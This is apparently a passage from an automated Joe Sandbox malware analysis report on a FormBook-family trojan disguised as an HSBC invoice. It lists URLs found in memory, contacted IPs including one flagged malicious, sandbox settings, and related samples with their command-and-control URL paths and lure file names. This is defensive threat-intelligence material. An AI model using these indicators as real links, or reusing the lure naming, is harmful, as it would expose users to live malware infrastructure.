                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_68.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004908000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/zixun/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl100g.website/news/Snfj.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_52.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdn.livechatinc.com/tracking.jsUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://img.leisu.com/uploads/allimg/190516/1-1Z51621O53-53.jpgrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_35.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.sophiahotelqingdao.com/news/bDhM.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.ecosia.org/newtab/rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_8.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://wap.tdvec.cn/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/yule/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsrundll32.exe, 0000000B.00000002.3728535943.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000003C78000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_90.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/css/animate.cssrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/css/style.cssrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_61.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/js/html2canvas.min.jsrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/js/jquery.lazy.jsrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_07.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.a9d.netrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/js/html5shiv.jsrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://app.zl1ht1.website/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_80.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/baike/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/picture/202209041662300408955816.pngrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssrundll32.exe, 0000000B.00000002.3728535943.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000003C78000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_77.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_78.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/css/swiper.min.cssrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.lavillitadepapa.com/6qht/?ylT8el=uvUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000050E2000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.lavillitadepapa.comUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3730033950.0000000005A43000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_14.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.zl100g.websiterundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_46.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_51.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_65.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/zhishi/UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1gya.website/news/X59A.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_66.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icorundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.yuanjihua.vip/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://m.rmrwvg.cn/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/shishang/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/js/common.jsrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://news.wawlh.cn/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ac.ecosia.org/autocomplete?q=rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/js/wow.min.jsrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_34.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_56.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zloyow.website/rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_37.htmlUTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/template/zblogres/khuboni/static/js/swiper.min.jsrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.livechat.com/chat-with/14282961/rundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.zl1l5r.website/post/1_50.htmlrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.livechat.com/?welcomerundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://beian.miit.gov.cnrundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  162.0.213.72
                  		www.hawalaz.xyzCanada
                  		35893ACPCAtrue
                  217.116.0.191
                  		www.lecoinsa.netSpain
                  		16371ACENS_ASSpainHostinghousingandVPNservicesESfalse
                  118.99.50.8
                  		www.zt555.shopHong Kong
                  		38186FTG-AS-APForewinTelecomGroupLimitedISPatHKfalse
                  162.209.189.210
                  		kloeti.pc205kopl.comUnited States
                  		40065CNSERVERSUSfalse
                  165.154.0.120
                  		7a4ca695fd164z.greycdn.netCanada
                  		7456INTERHOPCAfalse
                  74.208.46.171
                  		www.lavillitadepapa.comUnited States
                  		8560ONEANDONE-ASBrauerstrasse48DEfalse
                  198.16.50.172
                  		www.zl1l5r.websiteUnited States
                  		40065CNSERVERSUSfalse
                  104.21.21.230
                  		www.personalcaresale.shopUnited States
                  		13335CLOUDFLARENETUSfalse
                  3.33.130.190
                  		marismotivates.comUnited States
                  		8987AMAZONEXPANSIONGBfalse
                  121.37.199.72
                  		yetung.com.lho0.faipod.comChina
                  		55990HWCSNETHuaweiCloudServicedatacenterCNfalse
                  3.33.244.179
                  		www.oliviacorepilates.comUnited States
                  		8987AMAZONEXPANSIONGBfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1466744
                  Start date and time:2024-07-03 10:49:20 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 26s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:20
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:2
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:HSBCscancopy-invoice778483-payment87476MT103.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/5@19/11
                  EGA Information:
                  • Successful, ratio: 75%
                  HCA Information:
                  • Successful, ratio: 96%
                  • Number of executed functions: 61
                  • Number of non-executed functions: 275
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target UTbMqukHxZGmxEZNWddXnDURe.exe, PID 832 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  04:51:13API Interceptor10113719x Sleep call for process: rundll32.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  162.0.213.72Adjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • www.hawalaz.xyz/ercr/
                  nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                  • www.adoby.xyz/ghq5/
                  DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                  • www.adoby.xyz/ghq5/
                  Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                  • www.devele.top/nm4d/
                  Potvrda narudzbe u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • www.hawalaz.xyz/ercr/
                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                  • www.beescy.xyz/pdwc/
                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                  • www.beescy.xyz/pdwc/
                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                  • www.adoby.xyz/ghq5/
                  U prilogu lista novih narudzbi.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • www.hawalaz.xyz/ercr/
                  Salary List.exeGet hashmaliciousFormBookBrowse
                  • www.adoby.xyz/ghq5/
                  217.116.0.191Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                  • www.lecoinsa.net/zd4t/
                  D02984-KP-002011.exeGet hashmaliciousFormBookBrowse
                  • www.lecoinsa.net/7ffx/
                  REQN#1010135038.exeGet hashmaliciousFormBookBrowse
                  • www.lecoinsa.net/7ffx/
                  pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                  • www.lecoinsa.net/xu8t/
                  RFQ for Maintenance usering for Sabratha Project.exeGet hashmaliciousFormBookBrowse
                  • www.lecoinsa.net/zd4t/
                  CFV20240600121.exeGet hashmaliciousFormBookBrowse
                  • www.lecoinsa.net/xu8t/
                  Nbvkrvfanxfmla.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • www.captoriot.com/pn4e/?KfTD=TVbisx4cAYlWi1QWASjGfV1crgLBR8JtvsCp22pQc6hP3WdU+qw/hnDLngBsYyNwe7SkJXu6Y4ccrmt/HgV2tQEycSxLeHUr9w==&pd=8k02Xq71ReL2NgiL
                  fJXbhkbAh4.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • www.metabolomicsrubio.com/he4z/?iY0=3flPJv6ieGjXtu2BZjlDCLsRYPXaTlSmnAGDaGGFSllhsjO/k4Cp7cSc5yNsqXbWoVnAdcraHliC8m1hOte1JfoJWxEBFbScRA==&m5h_Y=eBnFNQLxHa46YDho
                  Image_0000384757.vbsGet hashmaliciousFormBookBrowse
                  • www.metabolomicsrubio.com/nbys/?bj=s1S3SPgRNf7lMN0xl2vbADF7xYqfipWGAgii2Z+ocbhr7l7z1f11h4s+9phUKVtapv+G0obo8tHeZk2i1iFboqWmw/7EeLn68w==&kfh=KmQsQQxqanX
                  order confirmation is attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • www.captoriot.com/pn4e/?0hNpF=TVbisx4cAYlWi1QWASjGfV1crgLBR8JtvsCp22pQc6hP3WdU+qw/hnDLngBsYyNwe7SkJXu6Y4ccrmt/HgV2tQEycSxLeHUr9w==&Ol53s=Ekys-3XKwc0kEr
                  162.209.189.210Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                  • www.66hc7.com/ooz9/
                  Halk #U0130#U015eLEM _24000000120887000033208 'd#U0131r.-1034 nolu TICARI .exeGet hashmaliciousFormBookBrowse
                  • www.66hc7.com/ooz9/?0N=MlFGyqpiH0BFSJI/fef/dCG888BGWBIcHVtVHklmmXS6c3kDIZAL8aaEfl7Aaohh3sZenWVq3ThPiwkLLGk004Us/fWH1X98Emf9JC/rX1g9bPHIk5sfq80=&3x=xxOtBHK

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  www.personalcaresale.shopnJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                  • 172.67.200.242
                  DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                  • 172.67.200.242
